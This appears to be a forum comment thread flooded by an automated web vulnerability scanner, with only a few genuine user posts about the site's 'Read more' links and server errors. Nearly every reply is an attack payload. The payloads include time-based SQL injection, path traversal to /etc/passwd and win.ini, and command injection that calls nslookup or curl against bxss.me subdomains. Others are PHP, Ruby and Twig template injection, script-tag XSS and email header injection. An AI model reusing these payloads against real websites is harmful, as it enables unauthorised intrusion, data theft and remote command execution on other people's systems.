-1 OR 563=(SELECT 563 FROM PG_SLEEP(15))--
re: Yee How
-1) OR 899=(SELECT 899 FROM PG_SLEEP(15))--
re: Yee How
-1)) OR 599=(SELECT 599 FROM PG_SLEEP(15))--
re: Yee How
MmUG2gnS' OR 728=(SELECT 728 FROM PG_SLEEP(15))--
re: Yee How
cWnJmaYB') OR 325=(SELECT 325 FROM PG_SLEEP(15))--
re: Yee How
tlXYY4IN')) OR 468=(SELECT 468 FROM PG_SLEEP(15))--
re: Yee How
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Yee How
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Yee How
'||(select 1 from (select pg_sleep(15))x)||'
re: Yee How
''||(select 1 from (select pg_sleep(15))x)||''
re: Yee How
'"
re: Yee How
@@VJmNg
re: Yee How
(select 198766*667891)
re: Yee How
(select 198766*667891 from DUAL)
thanks for the guide!
re: ericc
rPxuefja
re: ericc
1*
re: ericc
1*
re: ericc
1*
re: ericc
1*
re: ericc
-1 OR 2+212-212-1=0+0+0+1
re: ericc
-1 OR 3+212-212-1=0+0+0+1
re: ericc
if(now()=sysdate(),sleep(15),0)
re: ericc
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: ericc
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: ericc
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: ericc
-1; waitfor delay '0:0:15' --
re: ericc
-1); waitfor delay '0:0:15' --
re: ericc
1 waitfor delay '0:0:15' --
re: ericc
Ar7ckd60'; waitfor delay '0:0:15' --
re: ericc
-5 OR 212=(SELECT 212 FROM PG_SLEEP(15))--
re: ericc
-5) OR 559=(SELECT 559 FROM PG_SLEEP(15))--
re: ericc
-1)) OR 449=(SELECT 449 FROM PG_SLEEP(15))--
re: ericc
fK0QMifX' OR 510=(SELECT 510 FROM PG_SLEEP(15))--
re: ericc
vemKNEcp') OR 261=(SELECT 261 FROM PG_SLEEP(15))--
re: ericc
Z8OkxmnU')) OR 722=(SELECT 722 FROM PG_SLEEP(15))--
re: ericc
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: ericc
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: ericc
'||(select 1 from (select pg_sleep(15))x)||'
re: ericc
''||(select 1 from (select pg_sleep(15))x)||''
re: ericc
1'"
re: ericc
@@Fb5Be
re: ericc
1Coro82IrzO
re: ericc
response.write(9474154*9466484)
re: ericc
'+response.write(9474154*9466484)+'
re: ericc
"+response.write(9474154*9466484)+"
re: ericc
%0abcc:074625.67-22245.67.82e08.19990.2@bxss.me
re: ericc
to@example.com>%0d%0abcc:074625.67-22246.67.82e08.19990.2@bxss.me
re: ericc
<esi:include src="http://bxss.me/rpb.png"/>
re: ericc
${9999970+9999951}
re: ericc
../../../../../../../../../../../../../../etc/passwd
re: ericc
../../../../../../../../../../../../../../windows/win.ini
re: ericc
file:///etc/passwd
re: ericc
../../../../../../../../../../../../../../../proc/version
re: ericc
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: ericc
../../../../../../../../../../etc/passwd%00.jpg
re: ericc
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: ericc
)
re: ericc
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: ericc
!(()&&!|*|*|
re: ericc
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: ericc
^(#$!@#$)(()))******
re: ericc
echo lkscht$()\ ecznus\nz^xyu||a #' &echo lkscht$()\ ecznus\nz^xyu||a #|" &echo lkscht$()\ ecznus\nz^xyu||a #
re: ericc
/etc/passwd
re: ericc
&echo skmpkr$()\ erszpg\nz^xyu||a #' &echo skmpkr$()\ erszpg\nz^xyu||a #|" &echo skmpkr$()\ erszpg\nz^xyu||a #
re: ericc
%2fetc%2fpasswd
re: ericc
|echo qeosai$()\ mmdjbp\nz^xyu||a #' |echo qeosai$()\ mmdjbp\nz^xyu||a #|" |echo qeosai$()\ mmdjbp\nz^xyu||a #
re: ericc
/.././.././.././.././.././.././.././../etc/./passwd%00
re: ericc
(nslookup hitpfmhutuvrpfb954.bxss.me||perl -e "gethostbyname('hitpfmhutuvrpfb954.bxss.me')")
re: ericc
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: ericc
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: ericc
$(nslookup hitpxiqokibeuc1138.bxss.me||perl -e "gethostbyname('hitpxiqokibeuc1138.bxss.me')")
re: ericc
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: ericc
'.gethostbyname(lc('hitjr'.'bsjepkpx28bc8.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(108).chr(68).chr(100).chr(73).'
re: ericc
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: ericc
&nslookup hitmpeoxbgztme9048.bxss.me&'\"`0&nslookup hitmpeoxbgztme9048.bxss.me&`'
re: ericc
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: ericc
".gethostbyname(lc("hitty"."liloiwqv4c732.bxss.me."))."A".chr(67).chr(hex("58")).chr(119).chr(89).chr(122).chr(83)."
re: ericc
Http://bxss.me/t/fit.txt
re: ericc
&(nslookup hittclwebanwj8e16a.bxss.me||perl -e "gethostbyname('hittclwebanwj8e16a.bxss.me')")&'\"`0&(nslookup hittclwebanwj8e16a.bxss.me||perl -e "gethostbyname('hittclwebanwj8e16a.bxss.me')")&`'
re: ericc
http://bxss.me/t/fit.txt%3F.jpg
re: ericc
|(nslookup hitnunncldnwbf0af4.bxss.me||perl -e "gethostbyname('hitnunncldnwbf0af4.bxss.me')")
re: ericc
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: ericc
/etc/shells
re: ericc
`(nslookup hitwojkgwomra05214.bxss.me||perl -e "gethostbyname('hitwojkgwomra05214.bxss.me')")`
re: ericc
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: ericc
;(nslookup hitbjjbgqkgmne596e.bxss.me||perl -e "gethostbyname('hitbjjbgqkgmne596e.bxss.me')")|(nslookup hitbjjbgqkgmne596e.bxss.me||perl -e "gethostbyname('hitbjjbgqkgmne596e.bxss.me')")&(nslookup hitbjjbgqkgmne596e.bxss.me||perl -e "gethostbyname('hitbjjbgqkgmne596e.bxss.me')")
re: ericc
c:/windows/win.ini
re: ericc
file:///etc/passwd
re: ericc
bxss.me
re: ericc
/\../\../\../\../\../\../\../etc/passwd
re: ericc
/WEB-INF/web.xml
re: ericc
C:\WINDOWS\system32\drivers\etc\hosts
re: ericc
HttP://bxss.me/t/xss.html?%00
re: ericc
../../../../../../../../../../windows/win.ini%00.jpg
re: ericc
bxss.me/t/xss.html?%00
re: ericc
"+"A".concat(70-3).concat(22*4).concat(106).concat(65).concat(110).concat(66)+(require"socket"
Socket.gethostbyname("hitaz"+"fttrumri76fac.bxss.me.")[3].to_s)+"
re: ericc
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: ericc
/../../../../../../../../../../boot.ini
re: ericc
'+'A'.concat(70-3).concat(22*4).concat(99).concat(68).concat(115).concat(67)+(require'socket'
Socket.gethostbyname('hitqo'+'rbfcflqkfd6cf.bxss.me.')[3].to_s)+'
re: ericc
';print(md5(31337));$a='
re: ericc
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: ericc
";print(md5(31337));$a="
re: ericc
..\..\..\..\..\..\..\..\windows\win.ini
re: ericc
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: ericc
${@print(md5(31337))}
re: ericc
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: ericc
${@print(md5(31337))}\
re: ericc
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: ericc
'.print(md5(31337)).'
re: ericc
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: ericc
'"
re: ericc
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: ericc
<!--
re: ericc
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: ericc
WEB-INF/web.xml
re: ericc
WEB-INF\web.xml
re: ericc
1
re: ericc
1
re: ericc
-1 OR 2+697-697-1=0+0+0+1 --
re: ericc
-1 OR 3+697-697-1=0+0+0+1 --
re: ericc
-1 OR 2+173-173-1=0+0+0+1
re: ericc
-1 OR 3+173-173-1=0+0+0+1
re: ericc
-1' OR 2+320-320-1=0+0+0+1 --
re: ericc
-1' OR 3+320-320-1=0+0+0+1 --
re: ericc
-1' OR 2+586-586-1=0+0+0+1 or 'tJbY7LdN'='
re: ericc
-1' OR 3+586-586-1=0+0+0+1 or 'tJbY7LdN'='
re: ericc
-1" OR 2+168-168-1=0+0+0+1 --
re: ericc
-1" OR 3+168-168-1=0+0+0+1 --
re: ericc
if(now()=sysdate(),sleep(15),0)
re: ericc
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: ericc
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: ericc
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: ericc
-1; waitfor delay '0:0:15' --
re: ericc
-1); waitfor delay '0:0:15' --
re: ericc
1 waitfor delay '0:0:15' --
re: ericc
1S3ZZ4Z730
re: ericc
response.write(9340844*9016539)
re: ericc
'+response.write(9340844*9016539)+'
re: ericc
"+response.write(9340844*9016539)+"
re: ericc
<esi:include src="http://bxss.me/rpb.png"/>
re: ericc
../../../../../../../../../../../../../../etc/passwd
re: ericc
../../../../../../../../../../../../../../windows/win.ini
re: ericc
${9999355+9999601}
re: ericc
file:///etc/passwd
re: ericc
../
re: ericc
)
re: ericc
!(()&&!|*|*|
re: ericc
^(#$!@#$)(()))******
re: ericc
redirtest.acx
re: ericc
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
re: ericc
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpg
re: ericc
echo edgvhb$()\ hzilad\nz^xyu||a #' &echo edgvhb$()\ hzilad\nz^xyu||a #|" &echo edgvhb$()\ hzilad\nz^xyu||a #
re: ericc
/etc/shells
re: ericc
&echo cyyaxh$()\ yazrut\nz^xyu||a #' &echo cyyaxh$()\ yazrut\nz^xyu||a #|" &echo cyyaxh$()\ yazrut\nz^xyu||a #
re: ericc
../../../../../../../../../../../../../../etc/shells
re: ericc
'.gethostbyname(lc('hitvz'.'gamqriyfef973.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(115).chr(87).chr(105).chr(84).'
re: ericc
|echo rdnego$()\ tnwgrm\nz^xyu||a #' |echo rdnego$()\ tnwgrm\nz^xyu||a #|" |echo rdnego$()\ tnwgrm\nz^xyu||a #
re: ericc
c:/windows/win.ini
re: ericc
".gethostbyname(lc("hitvg"."ktegryru3531b.bxss.me."))."A".chr(67).chr(hex("58")).chr(120).chr(78).chr(113).chr(69)."
re: ericc
expr 9000235476 - 916634
re: ericc
bxss.me
re: ericc
gethostbyname(lc('hitcr'.'hybhzxgz6b2df.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(113).chr(85).chr(104).chr(72)
re: ericc
(nslookup -q=cname hitupeodzvcsfa3997.bxss.me||curl hitupeodzvcsfa3997.bxss.me))
re: ericc
Http://bxss.me/t/fit.txt
re: ericc
ctime
sleep
p0
(I30
tp1
Rp2
.
re: ericc
$(nslookup -q=cname hitqemafgvswadfb04.bxss.me||curl hitqemafgvswadfb04.bxss.me)
re: ericc
http://bxss.me/t/fit.txt?.jpg
re: ericc
&nslookup -q=cname hitbqvtgmmvyod4771.bxss.me&'\"`0&nslookup -q=cname hitbqvtgmmvyod4771.bxss.me&`'
re: ericc
&(nslookup -q=cname hitnsruubfzwj1d955.bxss.me||curl hitnsruubfzwj1d955.bxss.me)&'\"`0&(nslookup -q=cname hitnsruubfzwj1d955.bxss.me||curl hitnsruubfzwj1d955.bxss.me)&`'
re: ericc
|(nslookup -q=cname hitjdpjlwsamsd6484.bxss.me||curl hitjdpjlwsamsd6484.bxss.me)
re: ericc
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: ericc
`(nslookup -q=cname hitcmwsnrcpvkddfcb.bxss.me||curl hitcmwsnrcpvkddfcb.bxss.me)`
re: ericc
';print(md5(31337));$a='
re: ericc
;(nslookup -q=cname hitbzpnqfoslm895cf.bxss.me||curl hitbzpnqfoslm895cf.bxss.me)|(nslookup -q=cname hitbzpnqfoslm895cf.bxss.me||curl hitbzpnqfoslm895cf.bxss.me)&(nslookup -q=cname hitbzpnqfoslm895cf.bxss.me||curl hitbzpnqfoslm895cf.bxss.me)
re: ericc
";print(md5(31337));$a="
re: ericc
|(nslookup${IFS}-q${IFS}cname${IFS}hitojssuvhhoy7d10f.bxss.me||curl${IFS}hitojssuvhhoy7d10f.bxss.me)
re: ericc
'"()
re: ericc
${@print(md5(31337))}
re: ericc
&(nslookup${IFS}-q${IFS}cname${IFS}hitebggkgimneca5b3.bxss.me||curl${IFS}hitebggkgimneca5b3.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitebggkgimneca5b3.bxss.me||curl${IFS}hitebggkgimneca5b3.bxss.me)&`'
re: ericc
'&&sleep(27*1000)*ttwcdg&&'
re: ericc
${@print(md5(31337))}\
re: ericc
"&&sleep(27*1000)*litgsu&&"
re: ericc
HttP://bxss.me/t/xss.html?%00
re: ericc
'.print(md5(31337)).'
re: ericc
'||sleep(27*1000)*xckjjq||'
re: ericc
bxss.me/t/xss.html?%00
re: ericc
"||sleep(27*1000)*dxjnpf||"
re: ericc
"+"A".concat(70-3).concat(22*4).concat(107).concat(86).concat(119).concat(67)+(require"socket"
Socket.gethostbyname("hitsj"+"epiovetf9c154.bxss.me.")[3].to_s)+"
re: ericc
'+'A'.concat(70-3).concat(22*4).concat(120).concat(88).concat(100).concat(76)+(require'socket'
Socket.gethostbyname('hittj'+'xqvoorio220db.bxss.me.')[3].to_s)+'
re: ericc
'A'.concat(70-3).concat(22*4).concat(105).concat(83).concat(110).concat(72)+(require'socket'
Socket.gethostbyname('hitkq'+'apimqpzjb4e1f.bxss.me.')[3].to_s)
re: ericc
replies
re: ericc
replies�
re: ericc
'"
re: ericc
replies/.
re: ericc
<!--
re: ericc
'"()&%<zzz><ScRiPt >fRih(9458)</ScRiPt>
re: ericc
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitvxgebiqpsm9b2d9.bxss.me")}}
re: ericc
'"()&%<zzz><ScRiPt >fRih(9556)</ScRiPt>
re: ericc
9992673
re: ericc
lGCeUvih
re: ericc
*1
re: ericc
*1
re: ericc
*1
re: ericc
*1
re: ericc
-1 OR 5*5=25 --
re: ericc
-1 OR 5*5=26 --
re: ericc
-1 OR 5*5=25
re: ericc
-1 OR 5*5=26
re: ericc
*if(now()=sysdate(),sleep(15),0)
re: ericc
0'XOR(
*if(now()=sysdate(),sleep(15),0))XOR'Z
re: ericc
0"XOR(
*if(now()=sysdate(),sleep(15),0))XOR"Z
re: ericc
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: ericc
-1; waitfor delay '0:0:15' --
re: ericc
-1); waitfor delay '0:0:15' --
re: ericc
-1 waitfor delay '0:0:15' --
re: ericc
f2lq7cGv'; waitfor delay '0:0:15' --
re: ericc
-1 OR 186=(SELECT 186 FROM PG_SLEEP(15))--
re: ericc
-1) OR 450=(SELECT 450 FROM PG_SLEEP(15))--
re: ericc
-1)) OR 892=(SELECT 892 FROM PG_SLEEP(15))--
re: ericc
ra85MmQT' OR 23=(SELECT 23 FROM PG_SLEEP(15))--
re: ericc
TFhcnyn1') OR 435=(SELECT 435 FROM PG_SLEEP(15))--
re: ericc
ohyamNtY')) OR 882=(SELECT 882 FROM PG_SLEEP(15))--
re: ericc
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: ericc
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: ericc
'||(select 1 from (select pg_sleep(15))x)||'
re: ericc
''||(select 1 from (select pg_sleep(15))x)||''
re: ericc
'"
re: ericc
@@2z5s4
re: ericc
(select 198766*667891)
re: ericc
(select 198766*667891 from DUAL)
Hi all, is anyone having issues trying to access the "Read more" part of each thread? Wondering if it's just me.
Also, if you create a new post, I believe you must avoid certain special characters like question marks in the title, or else your post will redirect to an "Internal Server Error"?
re: Just_Ingest
b7gv32Ww
re: Just_Ingest
1*
re: Just_Ingest
1*
re: Just_Ingest
1*
re: Just_Ingest
1*
re: Just_Ingest
-1 OR 2+889-889-1=0+0+0+1
re: Just_Ingest
-1 OR 3+889-889-1=0+0+0+1
re: Just_Ingest
if(now()=sysdate(),sleep(15),0)
re: Just_Ingest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Just_Ingest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Just_Ingest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Just_Ingest
-1; waitfor delay '0:0:15' --
re: Just_Ingest
-1); waitfor delay '0:0:15' --
re: Just_Ingest
1 waitfor delay '0:0:15' --
re: Just_Ingest
ZmzqY3EJ'; waitfor delay '0:0:15' --
re: Just_Ingest
-5 OR 544=(SELECT 544 FROM PG_SLEEP(15))--
re: Just_Ingest
-5) OR 951=(SELECT 951 FROM PG_SLEEP(15))--
re: Just_Ingest
-1)) OR 161=(SELECT 161 FROM PG_SLEEP(15))--
re: Just_Ingest
uJqTpmZ7' OR 244=(SELECT 244 FROM PG_SLEEP(15))--
re: Just_Ingest
yrSRWMRM') OR 24=(SELECT 24 FROM PG_SLEEP(15))--
re: Just_Ingest
sFxYQxtc')) OR 46=(SELECT 46 FROM PG_SLEEP(15))--
re: Just_Ingest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Just_Ingest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Just_Ingest
'||(select 1 from (select pg_sleep(15))x)||'
re: Just_Ingest
''||(select 1 from (select pg_sleep(15))x)||''
re: Just_Ingest
1'"
re: Just_Ingest
@@KBxKm
re: Just_Ingest
1BMq8F7YVNO
re: Just_Ingest
%0abcc:074625.67-22239.67.5b050.19990.2@bxss.me
re: Just_Ingest
response.write(9622470*9157202)
re: Just_Ingest
to@example.com>%0d%0abcc:074625.67-22240.67.5b050.19990.2@bxss.me
re: Just_Ingest
'+response.write(9622470*9157202)+'
re: Just_Ingest
"+response.write(9622470*9157202)+"
re: Just_Ingest
<esi:include src="http://bxss.me/rpb.png"/>
re: Just_Ingest
${9999498+10000225}
re: Just_Ingest
../../../../../../../../../../../../../../etc/passwd
re: Just_Ingest
